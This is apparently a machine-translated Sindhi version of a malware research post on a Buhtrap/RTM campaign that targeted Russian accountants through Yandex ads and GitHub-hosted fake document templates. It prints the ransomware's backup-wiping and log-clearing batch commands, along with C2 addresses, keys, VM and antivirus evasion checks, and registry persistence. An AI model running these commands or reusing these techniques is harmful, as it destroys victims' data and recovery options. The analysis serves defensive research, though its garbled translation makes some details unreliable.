سائبر حملي ۾ اڪائونٽنٽ کي نشانو بڻائڻ لاءِ، توهان استعمال ڪري سگهو ٿا ڪم جا دستاويز جيڪي اهي آن لائن ڳوليندا آهن. اهو لڳ ڀڳ اهو آهي جيڪو هڪ سائبر گروپ گذريل ڪجهه مهينن کان ڪري رهيو آهي، سڃاتل پٺاڻن کي ورهائڻ. и , گڏو گڏ cryptocurrencies چوري لاء encryptors ۽ سافٽ ويئر. سڀ کان وڌيڪ هدف روس ۾ واقع آهن. حملو Yandex.Direct تي بدسلوڪي اشتهار ڏيڻ سان ڪيو ويو. ممڪن متاثرين کي هڪ ويب سائيٽ ڏانهن هدايت ڪئي وئي جتي انهن کي هڪ دستاويز ٽيمپليٽ جي طور تي ظاهر ڪيل بدسلوڪي فائل ڊائون لوڊ ڪرڻ لاء چيو ويو. Yandex اسان جي ڊيڄاريندڙ کان پوء بدسلوڪي اشتهارن کي هٽايو.
Buhtrap جو سورس ڪوڊ ماضي ۾ آن لائن ليڪ ڪيو ويو آهي ان ڪري ڪو به ان کي استعمال ڪري سگهي ٿو. اسان وٽ RTM ڪوڊ جي دستيابي بابت ڪا ڄاڻ ناهي.
هن پوسٽ ۾ اسين توهان کي ٻڌائي سگهنداسين ته حملي ڪندڙن ڪيئن ورهايو مالويئر استعمال ڪندي Yandex.Direct ۽ ان کي ميزباني ڪيو GitHub تي. پوسٽ مالويئر جي ٽيڪنيڪل تجزيو سان ختم ٿيندي.
Buhtrap ۽ RTM واپس ڪاروبار ۾ آهن
پکيڙ ۽ متاثرين جو ميکانيزم
متاثرين تائين پهچايا ويا مختلف پيل لوڊ هڪ عام پروپيگنڊا ميڪانيزم کي حصيداري ڪن ٿا. حملي ڪندڙن پاران ٺاهيل سڀئي خراب فائلون ٻن مختلف GitHub مخزن ۾ رکيل هيون.
عام طور تي، مخزن ۾ هڪ ڊائون لوڊ ڪرڻ واري بدسلوڪي فائل شامل آهي، جيڪا اڪثر تبديل ٿي ويندي آهي. جتان GitHub توهان کي مخزن ۾ تبديلين جي تاريخ ڏسڻ جي اجازت ڏئي ٿو، اسان ڏسي سگهون ٿا ته ڪنهن خاص عرصي دوران مالويئر ورهايو ويو. متاثر کي قائل ڪرڻ لاءِ خراب فائل کي ڊائون لوڊ ڪرڻ لاءِ، ويب سائيٽ blanki-shabloni24[.]ru، مٿي ڏنل شڪل ۾ ڏيکاريل آهي، استعمال ڪيو ويو.
سائيٽ جي ڊيزائن ۽ بدسلوڪي فائلن جا سڀئي نالا هڪ واحد تصور جي پيروي ڪندا آهن - فارم، ٽيمپليٽ، معاهدو، نمونا، وغيره. انهي ڳالهه تي غور ڪندي ته Buhtrap ۽ RTM سافٽ ويئر اڳ ۾ ئي اڪائونٽن تي حملن ۾ استعمال ڪيا ويا آهن، اسان فرض ڪيو ته نئين مهم ۾ حڪمت عملي ساڳي آهي. صرف سوال اهو آهي ته مقتول ڪيئن حملو ڪندڙن جي ويب سائيٽ تي ويو.
انفيڪشن
گهٽ ۾ گهٽ ڪيترن ئي امڪاني متاثرين جيڪي هن سائيٽ تي ختم ٿي ويا آهن بدسلوڪي اشتهارن طرفان متوجه ٿيا. هيٺ ڏنل هڪ مثال URL آهي:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
جئين توهان لنڪ مان ڏسي سگهو ٿا، بينر تي پوسٽ ڪيو ويو جائز اڪائونٽنگ فورم bb.f2[.]kz. اهو نوٽ ڪرڻ ضروري آهي ته بينر مختلف سائيٽن تي ظاهر ٿيا، سڀني کي هڪ ئي مهم جي سڃاڻپ هئي (blanki_rsya)، ۽ گهڻو ڪري اڪائونٽنگ يا قانوني مدد جي خدمتن سان لاڳاپيل. URL ڏيکاري ٿو ته امڪاني قرباني استعمال ڪيو درخواست "ڊائون لوڊ انوائس فارم"، جيڪو ھدف ٿيل حملن جي اسان جي مفروضي کي سپورٽ ڪري ٿو. هيٺيون سائيٽون آهن جتي بينر ظاهر ٿيا ۽ لاڳاپيل ڳولا سوال.
- انوائس فارم ڊائون لوڊ ڪريو - bb.f2[.]kz
- نموني معاهدو - Ipopen[.]ru
- درخواست جي شڪايت جو نمونو - 77metrov[.]ru
- معاهدو فارم - blank-dogovor-kupli-prodazhi[.]ru
- نموني عدالت جي درخواست - zen.yandex[.]ru
- نموني شڪايت - yurday[.]ru
- نموني معاهدي جا فارم - Regforum[.]ru
- معاهدو فارم - مددگار[.]ru
- نموني اپارٽمينٽ معاهدو - napravah[.]com
- قانوني معاهدن جا نمونا - avito[.]ru
blanki-shabloni24[.]ru سائيٽ شايد ترتيب ڏني وئي هجي ته جيئن هڪ سادي بصري جائزي کي پاس ڪرڻ لاءِ. عام طور تي، هڪ اشتهار جيڪو هڪ پروفيشنل ڏسندڙ سائيٽ ڏانهن اشارو ڪري ٿو GitHub جي لنڪ سان اهو لڳي ٿو ته ڪجهه واضح طور تي خراب ناهي. ان کان علاوه، حملي ڪندڙن بدسلوڪي فائلن کي صرف محدود عرصي تائين مخزن تي اپلوڊ ڪيو، ممڪن طور تي مهم دوران. اڪثر وقت، GitHub مخزن ۾ هڪ خالي زپ آرڪائيو يا هڪ خالي EXE فائل شامل آهي. اهڙيء طرح، حملي ڪندڙ اشتهارن کي ورهائي سگھن ٿا Yandex.Direct جي ذريعي سائيٽن تي جيڪي گهڻو ڪري انهن اڪائونٽن جو دورو ڪيو ويو جيڪي مخصوص ڳولا سوالن جي جواب ۾ آيا هئا.
اڳيون، اچو ته ڏسو مختلف پيلي لوڊ هن طريقي سان ورهايل آهن.
پيل لوڊ تجزيو
تقسيم جي تاريخ
بدسلوڪي مهم آڪٽوبر 2018 جي آخر ۾ شروع ٿي ۽ لکڻ جي وقت تي سرگرم آهي. جيئن ته سڄو مخزن عوامي طور تي GitHub تي دستياب هو، اسان ڇهن مختلف مالويئر خاندانن جي ورڇ جي هڪ صحيح ٽائم لائن مرتب ڪيو (هيٺ ڏنل شڪل ڏسو). اسان هڪ لائن شامل ڪئي آهي ڏيکاريندي جڏهن بينر لنڪ دريافت ڪئي وئي، جيئن ماپي وئي ESET ٽيليميٽري، گٽ جي تاريخ سان مقابلي لاءِ. جئين توهان ڏسي سگهو ٿا، اهو سٺو تعلق آهي GitHub تي پيل لوڊ جي دستيابي سان. فيبروري جي آخر ۾ تفاوت هن حقيقت جي وضاحت ڪري سگهجي ٿو ته اسان وٽ تبديلي جي تاريخ جو حصو نه آهي ڇاڪاڻ ته مخزن کي هٽايو ويو GitHub کان اڳ اسان ان کي مڪمل طور تي حاصل ڪري سگهون ٿا.
شڪل 1. مالويئر ورهائڻ جي تاريخ.
ڪوڊ سائن ان سرٽيفڪيٽ
مهم ڪيترن ئي سرٽيفڪيٽ استعمال ڪيو. ڪجھ هڪ کان وڌيڪ مالويئر خاندان پاران دستخط ڪيا ويا، جنهن مان وڌيڪ اشارو ڪيو ويو آهي ته مختلف نمونن جو تعلق ساڳئي مهم سان آهي. نجي چاٻي جي دستيابي جي باوجود، آپريٽرز بائنري کي منظم طور تي سائن ان نه ڪيو ۽ سڀني نموني لاء ڪنجي استعمال نه ڪيو. فيبروري 2019 جي آخر ۾، حملو ڪندڙن گوگل جي ملڪيت واري سرٽيفڪيٽ استعمال ڪندي غلط دستخط ٺاهڻ شروع ڪيا جن لاءِ انهن وٽ نجي ڪي نه هئي.
مهم ۾ شامل سڀئي سرٽيفڪيٽ ۽ مالويئر خاندان جيڪي انهن تي دستخط ڪن ٿا هيٺ ڏنل جدول ۾ درج ٿيل آهن.
اسان انهن ڪوڊ سائننگ سرٽيفڪيٽن کي پڻ استعمال ڪيو آهي ٻين مالويئر خاندانن سان لنڪ قائم ڪرڻ لاءِ. اڪثر سرٽيفڪيٽن لاءِ، اسان کي نمونا نه مليا جيڪي ورهايل نه هئا GitHub مخزن جي ذريعي. بهرحال، TOV “MARIA” سرٽيفڪيٽ استعمال ڪيو ويو botnet سان تعلق رکندڙ مالويئر کي سائن ڪرڻ لاءِ , adware ۽ miners. اهو ممڪن ناهي ته هي مالويئر هن مهم سان لاڳاپيل آهي. گهڻو ڪري، سند ڊارڪٽ تي خريد ڪيو ويو.
Win32/Filecoder.Buhtrap
پهريون حصو جيڪو اسان جي ڌيان کي پڪڙيو هو نئون دريافت ڪيل Win32/Filecoder.Buhtrap. هي هڪ ڊيلفي بائنري فائل آهي جيڪا ڪڏهن ڪڏهن پيڪيج ٿيل آهي. اهو خاص طور تي فيبروري-مارچ 2019 ۾ ورهايو ويو. اهو هڪ ransomware پروگرام جي مطابق آهي - اهو مقامي ڊرائيو ۽ نيٽ ورڪ فولڊر ڳولهي ٿو ۽ ڳوليل فائلن کي انڪرپٽ ڪري ٿو. ان کي سمجھوتي ڪرڻ لاءِ انٽرنيٽ ڪنيڪشن جي ضرورت نه آھي ڇاڪاڻ ته اھو انڪرپشن ڪيز موڪلڻ لاءِ سرور سان رابطو نٿو ڪري. ان جي بدران، اهو هڪ "ٽوڪن" شامل ڪري ٿو تاوان واري پيغام جي آخر ۾، ۽ مشورو ڏئي ٿو اي ميل يا Bitmessage استعمال ڪرڻ لاءِ آپريٽرز سان رابطو ڪرڻ لاءِ.
ممڪن حد تائين حساس وسيلن کي انڪرپٽ ڪرڻ لاءِ، Filecoder.Buhtrap ھڪ ٿريڊ ھلائي ٿو جيڪو اھم سافٽ ويئر کي بند ڪرڻ لاءِ ٺاھيو ويو آھي جنھن ۾ کليل فائل ھينڊلر ھوندا آھن جن ۾ قيمتي معلومات ھوندي آھي جيڪا انڪريپشن ۾ مداخلت ڪري سگھي ٿي. ھدف وارا عمل بنيادي طور تي ڊيٽابيس مينيجمينٽ سسٽم (DBMS) آھن. اضافي طور تي، Filecoder.Buhtrap ڊيٽا جي بحالي کي ڏکيو ڪرڻ لاء لاگ فائلن ۽ بيڪ اپ کي حذف ڪري ٿو. هن کي ڪرڻ لاء، هيٺ ڏنل بيچ اسڪرپٽ کي هلايو.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap هڪ جائز آن لائن IP Logger سروس استعمال ڪري ٿو جيڪا ويب سائيٽ جي دورو ڪندڙن بابت معلومات گڏ ڪرڻ لاءِ ٺهيل آهي. اهو مقصد آهي ransomware جي متاثرين کي ٽريڪ ڪرڻ، جيڪو ڪمانڊ لائن جي ذميواري آهي:
mshta.exe "javascript:document.write('');"
انڪرپشن لاءِ فائلون چونڊيل آھن جيڪڏھن اھي نه ٿيون ملن ٽن خارج ٿيل لسٽن سان. سڀ کان پهرين، هيٺ ڏنل واڌارن سان فائلون انڪريپٽ ٿيل نه آهن: .com، .cmd، .cpl، .dll، .exe، .hta، .lnk، .msc، .msi، .msp، .pif، .scr، .sys ۽ بٽ ٻيو، سڀئي فائلون جن لاءِ مڪمل رستو ھيٺ ڏنل فهرست مان ڊاريڪٽري اسٽرنگ تي مشتمل آھي خارج ٿيل آھن.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
ٽيون، ڪجهه فائلن جا نالا پڻ انڪرپشن مان خارج ڪيا ويا آهن، انهن مان رينسم پيغام جي فائل جو نالو. فهرست ھيٺ ڏنل آھي. ظاهر آهي، اهي سڀئي استثنا آهن مشين کي هلائڻ لاء، پر گهٽ ۾ گهٽ روڊ جي صلاحيت سان.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
فائل انڪرپشن اسڪيم
هڪ دفعو تي عمل ڪيو ويو، مالويئر هڪ 512-bit RSA اهم جوڙو ٺاهي ٿو. پرائيويٽ ايڪسپونٽ (d) ۽ modulus (n) پوءِ هڪ هارڊ ڪوڊ ٿيل 2048-bit پبلڪ ڪي (عوامي ايڪسپونٽ ۽ ماڊلس)، zlib-packed، ۽ base64 انڪوڊ ٿيل آهن. هن لاء ذميوار ڪوڊ تصوير 2 ۾ ڏيکاريل آهي.
شڪل 2. 512-bit RSA ڪيپي پيئر جنريشن جي عمل جي Hex-rays decompilation جو نتيجو.
هيٺ ڏنل هڪ سادي متن جو هڪ مثال آهي ٺاهيل پرائيويٽ ڪنجي سان، جيڪو هڪ ٽوڪن آهي جيڪو تاوان جي پيغام سان ڳنڍيل آهي.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
حملي آورن جي عوامي ڪنجي هيٺ ڏنل آهي.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
AES-128-CBC استعمال ڪندي فائلن کي 256-bit ڪيچ سان گڏ ڪيو ويو آهي. هر انڪريپٽ ٿيل فائل لاء، هڪ نئين چيڪ ۽ نئين شروعاتي ویکٹر ٺاهيل آهن. اهم معلومات انڪوڊ ٿيل فائل جي آخر ۾ شامل ڪئي وئي آهي. اچو ته انڪريپٽ ٿيل فائل جي فارميٽ تي غور ڪريون.
انڪرپٽ ٿيل فائلن ۾ ھيٺيون ھيڊر آھن:
ماخذ فائل ڊيٽا VEGA جادو قدر جي اضافي سان گڏ پهرين 0x5000 بائيٽ تائين انڪوڊ ٿيل آهي. سڀ ڊڪرپشن معلومات ھيٺ ڏنل ڍانچي سان ھڪڙي فائل سان ڳنڍيل آھي:
- فائل سائيز مارڪر ۾ هڪ نشان شامل آهي ته ڇا فائل سائيز ۾ 0x5000 بائيٽ کان وڏي آهي
- AES ڪيبل بلب = ZlibCompress (RSAEncrypt (AES ڪي + IV، ٺاهيل RSA ڪي جوڙو جو عوامي ڪيئي))
- RSA key blob = ZlibCompress (RSAEncrypt (ٺهيل RSA نجي ڪي، هارڊ ڪوڊ ٿيل RSA پبلڪ ڪي))
Win32/ClipBanker
Win32/ClipBanker هڪ جزو آهي جيڪو دير سان آڪٽوبر جي آخر کان ڊسمبر 2018 جي شروعات تائين ورهايو ويو. ان جو ڪردار ڪلپ بورڊ جي مواد جي نگراني ڪرڻ آهي، اهو cryptocurrency wallets جي پتي کي ڳولي ٿو. ھدف واري والٽ ايڊريس کي طئي ڪرڻ کان پوء، ClipBanker ان کي ھڪڙي ايڊريس سان تبديل ڪري ٿو جيڪو مڃي ٿو ته آپريٽرز سان تعلق رکي ٿو. جيڪي نمونا اسان جانچيا سي نه ته باڪس ٿيل هئا ۽ نه ئي مبهم هئا. رويي کي نقاب ڪرڻ لاءِ استعمال ٿيندڙ واحد ميکانيزم اسٽرنگ انڪرپشن آهي. آپريٽر والٽ ايڊريس RC4 استعمال ڪندي انڪريپٽ ٿيل آھن. ھدف cryptocurrencies آهن Bitcoin، Bitcoin نقد، Dogecoin، Ethereum ۽ Ripple.
ان عرصي دوران مالويئر حملو ڪندڙن جي Bitcoin والٽ ۾ پکڙجي ويو، هڪ ننڍڙي رقم VTS ڏانهن موڪلي وئي، جيڪا مهم جي ڪاميابي تي شڪ پيدا ڪري ٿي. اضافي طور تي، ڪو به ثبوت نه آهي ته اهو مشورو ڏئي ٿو ته اهي ٽرانزيڪشن ClipBanker سان لاڳاپيل هئا.
Win32/RTM
Win32 / RTM جزو ڪيترن ئي ڏينهن تائين مارچ 2019 جي شروعات ۾ ورهايو ويو. RTM هڪ ٽروجن بينڪر آهي جيڪو ڊيلفي ۾ لکيل آهي، جنهن جو مقصد ريموٽ بينڪنگ سسٽم آهي. 2017 ۾، ESET محقق شايع ڪيو هن پروگرام جي، وضاحت اڃا لاڳاپيل آهي. جنوري 2019 ۾، پولو آلٽو نيٽ ورڪ پڻ جاري ڪيو .
Buhtrap لوڊ ڪندڙ
ڪجهه وقت لاء، هڪ ڊائون لوڊ ڪندڙ GitHub تي دستياب هو، جيڪو اڳوڻو Buhtrap اوزار وانگر نه هو. هن ڏانهن رخ ڪيو https://94.100.18[.]67/RSS.php?<some_id> ايندڙ اسٽيج حاصل ڪرڻ ۽ ان کي سڌو سنئون ياداشت ۾ لوڊ ڪرڻ لاء. اسان ٻئي اسٽيج ڪوڊ جي ٻن رويي ۾ فرق ڪري سگھون ٿا. پهرئين URL ۾، RSS.php سڌو سنئون Buhtrap جي پٺئين دروازي کي پاس ڪيو- هي پٺاڻ دروازو بلڪل ساڳيو آهي جيڪو ماخذ ڪوڊ ليڪ ٿيڻ کان پوءِ موجود آهي.
دلچسپ ڳالهه اها آهي ته، اسان ڪيترن ئي مهمن کي ڏسون ٿا بوهٽرپ پٺئين دروازي سان، ۽ اهي مبينا طور تي مختلف آپريٽرز پاران هلائي رهيا آهن. انهي صورت ۾، بنيادي فرق اهو آهي ته پوئين دروازي کي سڌو سنئون ياداشت ۾ لوڊ ڪيو ويندو آهي ۽ ڊي ايل ايل جي ترتيب واري عمل سان معمولي اسڪيم استعمال نه ڪندو آهي جنهن بابت اسان ڳالهايو آهي. . ان کان علاوه، آپريٽرز RC4 ڪي کي تبديل ڪيو جيڪو نيٽ ورڪ ٽرئفڪ کي C&C سرور تي انڪرپٽ ڪرڻ لاءِ استعمال ڪيو ويو. اڪثر مهمن ۾ جيڪي اسان ڏٺا آهن، آپريٽرز هن ڪنجي کي تبديل ڪرڻ جي زحمت نه ڪندا هئا.
ٻيو، وڌيڪ پيچيده رويي اهو هو ته RSS.php URL ٻئي لوڊر ڏانهن منتقل ڪيو ويو. اهو ڪجهه رڪاوٽ تي عمل ڪيو، جهڙوڪ متحرڪ درآمد واري ٽيبل کي ٻيهر تعمير ڪرڻ. بوٽ لوڊر جو مقصد C&C سرور سان رابطو ڪرڻ آهي [.]com/api/F27F84EDA4D13B15/2، لاگ موڪليو ۽ جواب جو انتظار ڪريو. اهو جواب کي بلب جي طور تي پروسيس ڪري ٿو، ان کي ميموري ۾ لوڊ ڪري ٿو ۽ ان تي عمل ڪري ٿو. پيل لوڊ جيڪو اسان هن لوڊر تي عمل ڪندي ڏٺو اهو ساڳيو بوهٽريپ پٺئين دروازو هو، پر شايد ٻيا حصا هوندا.
Android/Spy.Banker
دلچسپ ڳالهه اها آهي ته Android لاءِ هڪ جزو پڻ مليو هو GitHub مخزن ۾. هو صرف هڪ ڏينهن لاءِ مکيه شاخ ۾ هو - نومبر 1، 2018. GitHub تي پوسٽ ٿيڻ کان سواء، ESET ٽيليميٽري هن مالويئر کي ورهائڻ جو ڪو ثبوت نه مليو.
جزو هڪ Android ايپليڪيشن پيڪيج (APK) جي طور تي ميزباني ڪيو ويو. اهو تمام گهڻو پريشان آهي. بدسلوڪي رويو لڪايو ويو آهي هڪ انڪرپٽ ٿيل JAR ۾ واقع آهي APK ۾. هن کي استعمال ڪندي RC4 سان انڪوڊ ٿيل آهي:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
ساڳيا ڪي ۽ الگورٿم تارن کي انڪرپٽ ڪرڻ لاءِ استعمال ٿين ٿا. JAR ۾ واقع آهي APK_ROOT + image/files. فائل جي پهرين 4 بائٽس تي مشتمل آهي انڪرپٽ ٿيل JAR جي ڊگھائي، جيڪا ڊگھي فيلڊ کان فوري طور تي شروع ٿئي ٿي.
فائل کي ڊريڪٽ ڪرڻ کان پوء، اسان دريافت ڪيو ته اهو Anubis هو - اڳ ۾ بينڪر لاء Android. مالويئر ۾ ھيٺيون خاصيتون آھن:
- مائڪروفون رڪارڊنگ
- اسڪرين شاٽ وٺڻ
- GPS ڪوآرڊينيٽ حاصل ڪرڻ
- keylogger
- ڊوائيس ڊيٽا انڪرپشن ۽ تاوان جي طلب
- اسپام موڪلڻ
دلچسپ ڳالهه اها آهي ته بينڪر Twitter استعمال ڪيو هڪ بيڪ اپ ڪميونيڪيشن چينل جي طور تي هڪ ٻيو C&C سرور حاصل ڪرڻ لاءِ. جنهن نموني جو اسان تجزيو ڪيو ان ۾ @JonesTrader اڪائونٽ استعمال ڪيو ويو، پر تجزيي جي وقت اهو اڳ ۾ ئي بلاڪ ڪيو ويو هو.
بئنڪر کي Android جي ڊوائس تي ٽارگيٽ اپليڪيشن جي هڪ فهرست تي مشتمل آهي. اهو سوفوس جي مطالعي ۾ حاصل ڪيل فهرست کان وڌيڪ آهي. لسٽ ۾ ڪيتريون ئي بئنڪنگ ايپليڪيشنون، آن لائن شاپنگ پروگرامز جهڙوڪ Amazon ۽ eBay، ۽ cryptocurrency خدمتون شامل آهن.
MSIL/ClipBanker.IH
هن مهم جي حصي طور ورهايل آخري حصو .NET Windows executable هو، جيڪو مارچ 2019 ۾ ظاهر ٿيو. اڀياس ڪيل اڪثر ورجن ConfuserEx v1.0.0 سان ڀريل هئا. ClipBanker وانگر، هي جزو ڪلپ بورڊ استعمال ڪري ٿو. هن جو مقصد هڪ وسيع رينج آهي cryptocurrencies، انهي سان گڏ Steam تي آڇون. اضافي طور تي، هو استعمال ڪري ٿو IP لاگر سروس Bitcoin نجي WIF ڪيچ چوري ڪرڻ لاء.
حفاظتي ميڪانيزم
فائدن کان علاوه ConfuserEx ڊيبگنگ، ڊمپنگ ۽ ڇڪتاڻ کي روڪڻ ۾ مهيا ڪري ٿو، جزو ۾ شامل آهي اينٽي وائرس پروڊڪٽس ۽ ورچوئل مشينن کي ڳولڻ جي صلاحيت.
تصديق ڪرڻ لاءِ ته اهو هڪ ورچوئل مشين ۾ هلندو آهي، مالويئر BIOS معلومات جي درخواست ڪرڻ لاءِ بلٽ ان ونڊوز WMI ڪمانڊ لائن (WMIC) استعمال ڪري ٿو، يعني:
wmic bios
پوءِ پروگرام ڪمانڊ آئوٽ کي پارس ڪري ٿو ۽ لفظن کي ڳولي ٿو: VBOX، VirtualBox، XEN، qemu، bochs، VM.
اينٽي وائرس پروڊڪٽس کي ڳولڻ لاءِ، مالويئر هڪ ونڊوز مينيجمينٽ انسٽرمينٽيشن (WMI) درخواست موڪلي ٿو ونڊوز سيڪيورٽي سينٽر کي استعمال ڪندي ManagementObjectSearcher API جيئن هيٺ ڏيکاريل آهي. بيس 64 کان ڊيڪوڊنگ کان پوءِ ڪال هن طرح لڳي ٿي:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
شڪل 3. اينٽي وائرس پراڊڪٽس جي سڃاڻپ لاءِ عمل.
ان کان علاوه، مالويئر چيڪ ڪري ٿو ته ڇا , ڪلپ بورڊ جي حملن کان بچائڻ لاء هڪ اوزار ۽، جيڪڏهن ڊوڙندو آهي، ان عمل ۾ سڀني موضوعن کي معطل ڪري ٿو، ان ڪري تحفظ کي غير فعال ڪري ٿو.
استقامت
مالويئر جو نسخو جيڪو اسان مطالعو ڪيو آهي پاڻ کي نقل ڪري ٿو %APPDATA%googleupdater.exe ۽ گوگل ڊاريڪٽري لاءِ ”لڪيل“ وصف مقرر ڪري ٿو. پوء هوء قيمت تبديل ڪري ٿي SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell ونڊوز رجسٽري ۾ ۽ رستو شامل ڪري ٿو updater.exe. هن طريقي سان، مالويئر تي عمل ڪيو ويندو هر وقت صارف لاگ ان ٿيندو.
خراب رويي
ClipBanker وانگر، مالويئر ڪلپ بورڊ جي مواد کي مانيٽر ڪري ٿو ۽ cryptocurrency والٽ پتي کي ڳولي ٿو، ۽ جڏهن مليو، ان کي آپريٽر جي پتي مان هڪ سان تبديل ڪري ٿو. ھيٺ ڏنل ھدف پتي جي ھڪڙي فهرست آھي جنھن جي بنياد تي ڪوڊ ۾ مليا آھن.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
هر قسم جي ايڊريس لاء هڪ لاڳاپيل باقاعده اظهار آهي. STEAM_URL قدر استعمال ڪيو ويندو آھي اسٽيم سسٽم تي حملو ڪرڻ لاءِ، جيئن باقاعده اظهار مان ڏسي سگھجي ٿو جيڪو بفر ۾ بيان ڪرڻ لاءِ استعمال ڪيو ويندو آھي:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltration چينل
بفر ۾ پتي کي تبديل ڪرڻ کان علاوه، مالويئر Bitcoin، Bitcoin Core ۽ Electrum Bitcoin wallets جي نجي WIF چاٻين کي ھدف ڪري ٿو. پروگرام استعمال ڪري ٿو plogger.org هڪ exfiltration چينل طور WIF نجي ڪي حاصل ڪرڻ لاءِ. ائين ڪرڻ لاءِ، آپريٽرس پرائيويٽ ڪي ڊيٽا شامل ڪن ٿا User-Agent HTTP هيڊر ۾، جيئن هيٺ ڏيکاريل آهي.
شڪل 4. IP Logger ڪنسول آئوٽ پٽ ڊيٽا سان.
آپريٽرز استعمال نه ڪندا هئا iplogger.org والٽ کي ڪڍڻ لاءِ. انهن شايد فيلڊ ۾ 255 ڪردار جي حد جي ڪري هڪ مختلف طريقو اختيار ڪيو User-AgentIP Logger ويب انٽرفيس ۾ ڏيکاريل آهي. نمونن ۾ اسان جو اڀياس ڪيو ويو، ٻيو ٻاھر نڪرڻ وارو سرور ماحول جي متغير ۾ محفوظ ڪيو ويو DiscordWebHook. حيرت انگيز طور تي، هي ماحول متغير ڪوڊ ۾ ڪٿي به نه لڳايو ويو آهي. اهو مشورو ڏئي ٿو ته مالويئر اڃا ترقي هيٺ آهي ۽ متغير آپريٽر جي ٽيسٽ مشين کي لڳايو ويو آهي.
اتي هڪ ٻيو نشاني آهي ته پروگرام ترقي ۾ آهي. بائنري فائل ۾ ٻه iplogger.org URLs شامل آهن، ۽ ٻنهي کان پڇا ڳاڇا ڪئي ويندي آهي جڏهن ڊيٽا خارج ڪئي ويندي آهي. انهن URLs مان هڪ جي درخواست ۾، ريفرر فيلڊ ۾ قدر "DEV /" کان اڳ آهي. اسان کي هڪ نسخو پڻ مليو آهي جيڪو پيڪيج نه ڪيو ويو هو ConfuserEx استعمال ڪندي، هن URL لاءِ وصول ڪندڙ جو نالو آهي DevFeedbackUrl. ماحولياتي متغير نالي جي بنياد تي، اسان يقين رکون ٿا ته آپريٽرز جائز سروس استعمال ڪرڻ جي منصوبابندي ڪري رهيا آهن Discord ۽ ان جي ويب مداخلت واري نظام کي cryptocurrency wallets چوري ڪرڻ لاء.
ٿڪل
